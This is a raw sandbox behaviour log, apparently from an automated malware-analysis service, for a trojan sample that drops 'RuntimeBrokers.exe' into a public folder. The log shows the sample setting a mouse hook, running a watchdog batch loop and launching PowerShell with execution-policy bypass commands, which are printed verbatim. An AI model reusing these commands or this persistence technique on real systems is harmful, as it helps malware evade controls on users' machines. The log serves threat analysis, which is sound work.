Source: powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000D.00000002.201200701612.0000000005457000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201201247161.00000000049E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 0000000E.00000002.201220974867.00000000085A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ion=v4.5
Source: powershell.exe, 0000000D.00000002.201206447534.0000000006368000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201209286352.00000000058F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 0000000D.00000002.201197665101.0000000003320000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.201198714669.00000000009A3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: RuntimeBrokers.exe, 00000004.00000003.201085672635.00000000015CF000.00000004.00000020.00020000.00000000.sdmp, libcurl.dll.0.drString found in binary or memory: https://sectigo.com/CPS0
Source: RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://update-xztodolist.cqttech.com/api/v1/update/check
Source: RuntimeBrokers.exe, 00000004.00000000.200383225107.0000000000CFF000.00000002.00000001.01000000.00000005.sdmpString found in binary or memory: https://update-xztodolist.cqttech.com/api/v1/update/checkXZDesktopCalendarCXZUpdateModule
Source: RuntimeBrokers.exe, 00000004.00000003.201172043695.00000000055C1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DirectInput8Creatememstr_664e0faa-d
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeWindows user hook set: 0 mouse low level C:\Windows\SYSTEM32\DINPUT8.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess Stats: CPU usage > 6%
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00404FAA0_2_00404FAA
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_0041206B0_2_0041206B
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_0041022D0_2_0041022D
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00411F910_2_00411F91
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: String function: 0040243B appears 37 times
Source: Fqae7BLq4m.exe, 00000000.00000002.200383820089.000000000041A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameV vs Fqae7BLq4m.exe
Source: Fqae7BLq4m.exe, 00000000.00000003.200307382834.0000000002601000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameV vs Fqae7BLq4m.exe
Source: Fqae7BLq4m.exeBinary or memory string: OriginalFilenameV vs Fqae7BLq4m.exe
Source: Fqae7BLq4m.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal88.troj.evad.winEXE@101/44@0/1
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00407776 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,??2@YAPAXI@Z,lstrcpyW,lstrcpyW,lstrcpyW,??3@YAXPAX@Z,LocalFree,0_2_00407776
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_0040118A GetDiskFreeSpaceExW,SendMessageW,0_2_0040118A
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_004034C1 _wtol,_wtol,SHGetSpecialFolderPathW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,CoCreateInstance,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_004034C1
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeCode function: 0_2_00401BDF GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,wsprintfW,LoadLibraryA,GetProcAddress,0_2_00401BDF
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeFile created: C:\Users\Public\BiliteJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8972:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9028:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8856:304:WilStaging_02
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9028:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3292:304:WilStaging_02
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeMutant created: \Sessions\1\BaseNamedObjects\2024.12.14
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8972:304:WilStaging_02
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeFile created: C:\Users\user\AppData\Local\Temp\monitor.batJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: Fqae7BLq4m.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\findstr.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process WHERE Caption = 'RUNTIMEBROKERS.EXE'
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Fqae7BLq4m.exeReversingLabs: Detection: 42%
Source: Fqae7BLq4m.exeVirustotal: Detection: 19%
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeFile read: C:\Users\user\Desktop\Fqae7BLq4m.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Fqae7BLq4m.exe "C:\Users\user\Desktop\Fqae7BLq4m.exe"
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe"
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreak
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe"
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exe C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /B /c "C:\Users\user\AppData\Local\Temp\\monitor.bat"Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 30 /nobreakJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "IMAGENAME eq RuntimeBrokers.exe" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Set-ExecutionPolicy Unrestricted -Scope CurrentUser"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -ExecutionPolicy Bypass -File C:\Users\user\AppData\Local\updated.ps1Jump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\Fqae7BLq4m.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: libcurl.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: version.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: oleacc.dllJump to behavior
Source: C:\Users\Public\Bilite\Axialis\RuntimeBrokers.exeSection loaded: msimg32.dllJump to behavior
